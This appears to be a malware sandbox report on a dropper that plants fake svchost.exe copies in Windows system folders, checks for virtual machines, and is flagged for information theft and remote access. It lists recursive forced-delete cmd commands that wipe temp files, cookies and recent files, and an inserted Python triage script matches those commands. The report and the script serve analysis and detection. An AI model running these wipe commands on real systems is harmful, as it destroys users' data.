Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose, 8_2_10008520
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose, 8_2_10008E40
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 8_2_100086F0
Source: C:\Windows\SysWOW64\033726\svchost.exe Code function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle, 8_2_10008F00
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA, 3_2_1000AA30
Source: C:\Windows\Temp\v5.exe Code function: 2_2_00406090 6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,GetSystemDefaultUILanguage,memset,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,_mbscpy,sprintf,_mbscpy,lstrcpy,RegQueryValueExA,GetSystemInfo,memset,sprintf,_mbscpy,_mbscpy,GlobalMemoryStatusEx,__aulldiv,__aulldiv,wsprintfA,malloc,GetAdaptersInfo,free,malloc,GetAdaptersInfo,strcmp,GetIfTable,??2@YAPAXI@Z,GetIfTable,sprintf,_mbscpy,sprintf,_mbscpy,??3@YAXPAX@Z,free,GetTickCount, 2_2_00406090
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 180000
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 60000
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 1200000
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 60000
Source: C:\Windows\Temp\server.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 180000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 60000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 1200000
Source: C:\Windows\SysWOW64\033726\svchost.exe Thread delayed: delay time: 180000
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.ini
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\Temp\ .exe File opened: C:\Users\user
Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll:
Source: server.exe, 00000003.00000002.2683900710.00000000006B0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lSTORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: .exe.0.dr Binary or memory string: 00-50-56 VMWare, Inc.
Source: v5.exe, 00000002.00000002.1330252488.0000000000794000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\-
Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}}
Source: .exe.0.dr Binary or memory string: 00-1C-14 VMware, Inc
Source: .exe.0.dr Binary or memory string: 00-0C-29 VMware, Inc.
Source: svchost.exe, 00000008.00000002.2659797363.0000000000885000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}[
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494804882.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1813321224.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1788077002.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1734581133.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1634021026.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1446219800.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWF
Source: .exe.0.dr Binary or memory string: 00-05-69 VMWARE, Inc.
Source: .exe, 00000005.00000003.1360796714.0000000002456000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 00-1C-14 VMware, IncG
Source: svchost.exe, 00000008.00000002.2651704250.000000000084C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: v5.exe, 00000002.00000002.1330252488.000000000076D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\v5.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\033726\svchost.exe API call chain: ExitProcess graph end node
Source: C:\Windows\Temp\server.exe Process information queried: ProcessInformation
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000F3A0 BlockInput,BlockInput, 3_2_1000F3A0
Source: C:\Windows\Temp\server.exe Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle, 3_2_100018A0
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_00405CFF GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_00405CFF
Source: C:\Windows\Temp\server.exe Code function: 3_2_00401000 VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualAlloc,VirtualAlloc, 3_2_00401000
Source: C:\Windows\Temp\ .exe Code function: 5_2_0044F257 SetUnhandledExceptionFilter, 5_2_0044F257
Source: C:\Windows\Temp\ .exe Code function: 5_2_0044F26B SetUnhandledExceptionFilter, 5_2_0044F26B
Source: C:\Windows\Temp\server.exe Code function: 3_2_1000F840 mouse_event,SetCursorPos,WindowFromPoint,SetCapture,MapVirtualKeyA,keybd_event,MapVirtualKeyA,keybd_event,mouse_event,mouse_event, 3_2_1000F840
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\Temp\server.exe Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & del /f /s /q %systemdrive%\*._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\*.bak & del /f /s /q %systemdrive%\*.old & del /f /s /q %windir%\softwaredistribution\download\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\*.* & del /f /q %userprofile%\cookies\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\*.* & del /f /s /q %userprofile%\recent\*.* & exit
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal*.* & exit
Source: C:\Windows\SysWOW64\033726\svchost.exe Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: C:\Windows\Temp\ .exe Code function: 5_2_00401680 AllocateAndInitializeSid,GetLengthSid,GetLengthSid,GetLengthSid,GetProcessHeap,GetProcessHeap,HeapAlloc,InitializeAcl,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,GetProcessHeap,GetProcessHeap,HeapFree,GetLengthSid,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,AddAce,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetProcessHeap,HeapFree,FreeSid, 5_2_00401680
Source: C:\Windows\Temp\server.exe Code function: 3_2_10025DC0 cpuid 3_2_10025DC0
Source: C:\Windows\Temp\ .exe Code function: lstrcpyA,LoadLibraryA,GetLocaleInfoA, 5_2_0045F814
Source: C:\Windows\Temp\ .exe Code function: GetThreadLocale,GetLocaleInfoA,GetACP, 5_2_00401060
Source: C:\Windows\Temp\ .exe Code function: GetLocaleInfoA, 5_2_00451400
Source: C:\Windows\Temp\ .exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion InstallDate
Source: C:\Windows\Temp\ .exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Temp\v5.exe Code function: 2_2_00402AD0 LoadLibraryA,LoadLibraryA,6D0C6DE0,6D0C6DE0,LoadLibraryA,6D0C6DE0,LoadLibraryA,6D0C6DE0,memset,lstrcmp,sprintf,sprintf,sprintf,Sleep,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, 2_2_00402AD0
Source: C:\Windows\Temp\server.exe Code function: 3_2_10007070 LookupAccountNameA,IsValidSid,Sleep,LoadLibraryA,GetProcAddress,FreeLibrary, 3_2_10007070
Source: C:\Windows\Temp\ .exe Code function: 5_2_00433020 SendMessageA,SendMessageA,RegQueryValueExA,SystemTimeToVariantTime,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,GetTimeZoneInformation,SendMessageA,SendMessageA,SendMessageA,SendMessageA,RegOpenKeyExA,SendMessageA,SendMessageA, 5_2_00433020
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe Code function: 0_2_004059FF GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA, 0_2_004059FF
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: kxetray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: KSafeTray.exe
Source: server.exe, server.exe, 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, svchsot.exe, 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: 360tray.exe
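Added example, not part of the sandbox report and not code from the sample: a small Python triage that replays the behaviours listed above against constructed Sysmon-style process-creation events. It flags svchost.exe started from C:\Windows\SysWOW64\033726, the dropped executable whose basename is a single space (C:\Windows\Temp\ .exe), v5.exe removing itself through cmd.exe /c del, the cmd.exe /k del /f /s /q wipe loops, and the svchsot.exe look-alike name that appears in the memory strings. The event records, the Sysmon field names, the path assumed for svchsot.exe and the clean services.exe-launched svchost.exe used as a negative case are assumptions made for the example; the other paths and command lines are taken from the report.

```python
"""Triage of process-creation events for the behaviours in this report.
Added example; EVENTS below is constructed to mirror the report's process
tree using Sysmon Event ID 1 field names (Image, CommandLine, ParentImage)."""
from __future__ import annotations

import ntpath
import re

# Directories from which a genuine svchost.exe (and friends) may run.
SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Benign system names that droppers reuse or typo-squat.
SYSTEM_NAMES = {"svchost.exe", "csrss.exe", "lsass.exe", "explorer.exe"}

# "del /f /s /q %systemdrive%\..." style recursive wipes seen in the report.
MASS_DELETE = re.compile(
    r"\bdel\s+/f\s+(?:/s\s+)?/q\s+%(?:systemdrive|windir|userprofile)%", re.I)
# "cmd.exe /c del <path>" as used by v5.exe to remove itself.
SELF_DELETE = re.compile(r'cmd(?:\.exe)?"?\s+/c\s+del\s+(?P<target>\S+)', re.I)


def one_edit_apart(a: str, b: str) -> bool:
    """True if a and b have equal length and differ by exactly one
    substitution or one swap of adjacent characters (svchsot vs svchost)."""
    if len(a) != len(b):
        return False
    diff = [i for i in range(len(a)) if a[i] != b[i]]
    if len(diff) == 1:
        return True
    if len(diff) == 2 and diff[1] == diff[0] + 1:
        i, j = diff
        return a[i] == b[j] and a[j] == b[i]
    return False


def triage(event: dict) -> list[str]:
    """Return the findings for one process-creation event (empty if clean)."""
    image = event["Image"]
    cmdline = event.get("CommandLine", "")
    parent = event.get("ParentImage", "")
    directory, name = (s.lower() for s in ntpath.split(image))
    findings: list[str] = []

    # 1. System-process name started outside System32/SysWOW64.
    if name in SYSTEM_NAMES and directory not in SYSTEM_DIRS:
        findings.append(f"system-process name outside system directory: {image}")

    # 2. Look-alike of a system-process name.
    for legit in sorted(SYSTEM_NAMES):
        if name != legit and one_edit_apart(name, legit):
            findings.append(f"look-alike of {legit}: {image}")

    # 3. Basename that is empty or whitespace only (C:\Windows\Temp\ .exe).
    stem = name[:-4] if name.endswith(".exe") else name
    if not stem.strip():
        findings.append(f"executable with blank basename: {image}")

    # 4. Executable launched from C:\Windows\Temp.
    if directory == r"c:\windows\temp":
        findings.append(f"executable run from Windows Temp: {image}")

    # 5. cmd.exe /c del pointed at its own parent image (self-removal).
    m = SELF_DELETE.search(cmdline)
    if m and parent and m.group("target").strip('"').lower() == parent.lower():
        findings.append(f"parent deletes itself via cmd: {parent}")

    # 6. Forced recursive deletion across the system drive or user profile.
    if name == "cmd.exe" and MASS_DELETE.search(cmdline):
        findings.append("mass recursive deletion from cmd.exe")

    return findings


def ev(image: str, parent: str, cmdline: str) -> dict:
    return {"Image": image, "ParentImage": parent, "CommandLine": cmdline}


# Constructed events mirroring the report's process tree. The svchsot.exe
# path and the final services.exe-launched svchost.exe are assumptions.
EVENTS = [
    ev(r"C:\Users\user\Desktop\G3izWAY3Fa.exe", r"C:\Windows\explorer.exe",
       r'"C:\Users\user\Desktop\G3izWAY3Fa.exe"'),
    ev(r"C:\Windows\Temp\v5.exe", r"C:\Users\user\Desktop\G3izWAY3Fa.exe",
       r'"C:\Windows\temp\v5.exe"'),
    ev(r"C:\Windows\Temp\ .exe", r"C:\Users\user\Desktop\G3izWAY3Fa.exe",
       r'"C:\Windows\temp\ .exe"'),
    ev(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\Temp\v5.exe",
       r'"C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul'),
    ev(r"C:\Windows\SysWOW64\033726\svchost.exe", r"C:\Windows\Temp\server.exe",
       r'"C:\Windows\system32\033726\svchost.exe"'),
    ev(r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\Temp\ .exe",
       r'"C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.tmp & exit'),
    ev(r"C:\Windows\SysWOW64\svchsot.exe", r"C:\Windows\SysWOW64\033726\svchost.exe",
       r'"C:\Windows\system32\svchsot.exe"'),
    ev(r"C:\Windows\SysWOW64\svchost.exe", r"C:\Windows\System32\services.exe",
       r"C:\Windows\SysWOW64\svchost.exe -k netsvcs"),
]


def run(events: list[dict]) -> dict[str, list[str]]:
    """Map each flagged image to its findings; clean events are omitted."""
    report: dict[str, list[str]] = {}
    for event in events:
        hits = triage(event)
        if hits:
            report.setdefault(event["Image"], []).extend(hits)
    return report


if __name__ == "__main__":
    for image, hits in run(EVENTS).items():
        print(image)
        for hit in hits:
            print("   ", hit)
```

The self-deletion check compares the del target against the parent image rather than just matching "cmd /c del", because legitimate installers also delete files through cmd; the look-alike check deliberately requires equal length so that unrelated short names (cmd.exe, v5.exe) never trip it.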

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2705894321.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.2706650103.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.1327667856.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1452368472.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2594167310.0000000000401000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.1534647455.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1431291554.000000001007A000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: server.exe PID: 7472, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 7844, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchost.exe PID: 8032, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchsot.exe PID: 8104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: svchsot.exe PID: 4848, type: MEMORYSTR